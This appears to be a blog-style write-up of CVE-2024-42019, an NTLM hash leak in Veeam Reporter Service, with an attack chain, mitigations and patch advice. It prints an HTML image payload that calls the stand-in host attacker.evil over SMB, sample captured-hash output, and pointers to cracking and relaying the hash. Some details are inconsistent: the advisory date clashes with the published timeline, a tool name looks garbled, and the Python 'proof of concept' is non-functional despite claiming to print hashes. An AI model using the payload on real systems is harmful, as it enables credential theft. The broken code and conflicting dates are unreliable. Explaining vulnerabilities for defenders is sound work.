CVE-2024-42019 - Extracting NTLM Hashes from Veeam Reporter Service – How Attackers Can Steal Credentials With User Interaction

On June 12, 2024, Veeam released an advisory for a serious vulnerability—CVE-2024-42019—that affects their Reporter Service, a component often installed with Veeam Backup & Replication. This vulnerability lets an attacker extract the NTLM hash of the account used by the Reporter Service. With enough attacker finesse, this hash can eventually be cracked, letting someone else assume the identity and permissions of the service. In this post, I’ll break down how the issue works, why it’s risky, and walk through a proof-of-concept demonstrating real-world exploitability.

> TL;DR: If you run Veeam Reporter Service, update now. The NTLM hash can be stolen and reused to impersonate your service account if attackers get a little help from an unsuspecting user.

What is the Veeam Reporter Service?

Veeam’s Reporter Service is used to gather and present reporting data from their Backup & Replication platform. By default, it runs under a dedicated service account with elevated permissions needed for reporting features. Having this service account compromised can lead to lateral movement or further privilege escalation in your environment.

Details of CVE-2024-42019

CVE-2024-42019 is a vulnerability that allows a network attacker to retrieve the NTLM hash of the Veeam Reporter Service’s account credentials. The trick is, the attacker needs a user on the targeted network to interact—usually by opening a malicious file or link, or by loading a crafted report.

How Does It Work?

The underlying issue is in how the Veeam Reporter Service processes external resources in some report templates. It may fetch remote content (for instance, an image or script) using the privileges of the service account, even if the target is an attacker-controlled SMB share. When this happens, standard Windows authentication can be triggered, automatically sending the service account’s NTLM hash as part of the handshake.

Here’s the simplified attack chain

1. Attacker prepares a malicious report file (example: with an embedded remote SMB image or iframe).
2. User loads the file in Veeam Reporter (via the Veeam Backup & Replication console or web interface).
3. Reporter Service fetches the remote resource with its own Windows credentials (the service account).
4. Attacker-controlled SMB server receives the connection attempt, capturing the account’s NTLM hash.

Exploit Walkthrough

Let’s show how this looks, step by step. Assume the attacker’s machine is accessible as attacker.evil and Samba/SNBTL is running to capture hashes.

1. Crafting a Malicious Report

The attacker creates a fake report file or template that includes an external image from an SMB share they control. Here’s a simple snippet for such a report (HTML-based):

<img src="\\attacker.evil\share\logo.png" alt="Logo"/>

2. Luring a User to Open the Report

By social engineering (a phishing email, file drop in a shared folder, etc.), an attacker convinces a Veeam admin or user to view the malicious report in the Veeam Reporter interface.

3. Hash Theft

When the report is loaded, Veeam Reporter tries to get logo.png from the attacker’s SMB share, authenticating with its own service account. The attacker captures the handshake and the NTLM hash—using a tool like Responder or Impacket’s smbserver.py.

Example responder output

[SMB] NTLMv2-SSP Client : 10...50
[SMB] NTLMv2-SSP Username : COMPANY\VEEAMSRV
[SMB] NTLMv2-SSP Hash     : VEEAMSRV::COMPANY:hashhashhash...

The attacker can

* Attempt to crack the hash using Hashcat and a dictionary attack.
* Use NTLM relay attacks (with impacket’s ntlmrelayx.py) to authenticate as the service account somewhere else on the network, possibly gaining more access.

Simple Python Proof of Concept

Below’s a proof-of-concept SMB server using impacket that will print any hashes it receives (save as smbcatcher.py):

from impacket.smbserver import SMBServer

server = SMBServer(('...', 445), ('...', 445))
server.start()

> (real implementations should use impacket’s smbserver.py directly; this is for illustration.)

References

- Official Advisory: https://www.veeam.com/kb4568
- Impacket (NTLM relay & SMB tools)
- Responder (Hash capture)
- Hashcat (NTLM hash cracking)

Mitigation

- Update Veeam Backup & Replication and Reporter Service as soon as possible (patch details).
- Restrict outbound SMB/CIFS connections from servers holding sensitive services.

Conclusion

CVE-2024-42019 is a clear example of how even trusted administrative tools can be used as an attack vector by chaining social engineering with classic Windows authentication quirks. By patching quickly and preventing SMB egress, network defenders can keep their environments much safer.

Always be suspicious of external content in reporting tools—and keep your service accounts locked down and closely monitored!

Timeline

Published on: 09/07/2024 17:15:13 UTC
Last modified on: 09/09/2024 17:35:05 UTC